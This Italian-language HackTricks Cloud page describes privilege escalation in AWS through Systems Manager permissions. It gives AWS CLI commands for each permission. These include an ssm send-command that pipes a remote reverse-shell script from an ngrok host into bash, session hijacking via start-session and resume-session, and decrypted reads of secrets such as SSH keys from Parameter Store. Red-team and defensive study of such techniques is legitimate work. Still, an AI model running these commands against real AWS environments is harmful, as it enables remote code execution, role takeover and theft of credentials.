HackTricks CloudAWS - SSM Privesc
Reading time: 5 minutes
tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
SSM
Per ulteriori informazioni su SSM controlla:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
ssm:SendCommand
Un attaccante con il permesso ssm:SendCommand può eseguire comandi nelle istanze che eseguono l'Amazon SSM Agent e compromettere il ruolo IAM che vi opera all'interno.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
Nel caso in cui tu stia utilizzando questa tecnica per elevare i privilegi all'interno di un'istanza EC2 già compromessa, potresti semplicemente catturare la rev shell localmente con:
# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
Impatto Potenziale: Privilegi di escalation diretti ai ruoli IAM EC2 associati a istanze in esecuzione con agenti SSM attivi.
ssm:StartSession
Un attaccante con il permesso ssm:StartSession può avviare una sessione simile a SSH nelle istanze che eseguono l'agente Amazon SSM e compromettere il ruolo IAM in esecuzione al suo interno.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"
caution
Per avviare una sessione è necessario avere installato il SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
Impatto Potenziale: Privesc diretto ai ruoli IAM EC2 associati alle istanze in esecuzione con SSM Agents attivi.
Privesc a ECS
Quando le attività ECS vengono eseguite con ExecuteCommand abilitato, gli utenti con permessi sufficienti possono utilizzare ecs execute-command per eseguire un comando all'interno del contenitore.
Secondo la documentazione, questo avviene creando un canale sicuro tra il dispositivo utilizzato per avviare il comando “exec” e il contenitore di destinazione con SSM Session Manager. (Plugin SSM Session Manager necessario affinché questo funzioni)
Pertanto, gli utenti con ssm:StartSession saranno in grado di ottenere una shell all'interno delle attività ECS con quell'opzione abilitata semplicemente eseguendo:
aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
.png)
Impatto Potenziale: Privesc diretto ai ruoli ECSIAM allegati ai task in esecuzione con ExecuteCommand abilitato.
ssm:ResumeSession
Un attaccante con il permesso ssm:ResumeSession può ri-avviare una sessione simile a SSH nelle istanze che eseguono l'Amazon SSM Agent con uno stato di sessione SSM disconnesso e compromettere il Ruolo IAM in esecuzione al suo interno.
# Check for configured instances
aws ssm describe-sessions
# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5
Impatto Potenziale: Privilegi di escalation diretti ai ruoli IAM EC2 associati a istanze in esecuzione con agenti SSM in esecuzione e sessioni disconnesse.
ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)
Un attaccante con i permessi menzionati sarà in grado di elencare i parametri SSM e leggerli in chiaro. In questi parametri puoi frequentemente trovare informazioni sensibili come chiavi SSH o chiavi API.
aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption
Impatto Potenziale: Trovare informazioni sensibili all'interno dei parametri.
ssm:ListCommands
Un attaccante con questo permesso può elencare tutti i comandi inviati e, si spera, trovare informazioni sensibili in essi.
aws ssm list-commands
Impatto Potenziale: Trovare informazioni sensibili all'interno delle righe di comando.
ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)
Un attaccante con questi permessi può elencare tutti i comandi inviati e leggere l'output generato sperando di trovare informazioni sensibili in esso.
# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations
aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
Impatto Potenziale: Trovare informazioni sensibili all'interno dell'output dei comandi.
Codebuild
Puoi anche utilizzare SSM per accedere a un progetto codebuild in fase di costruzione:
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.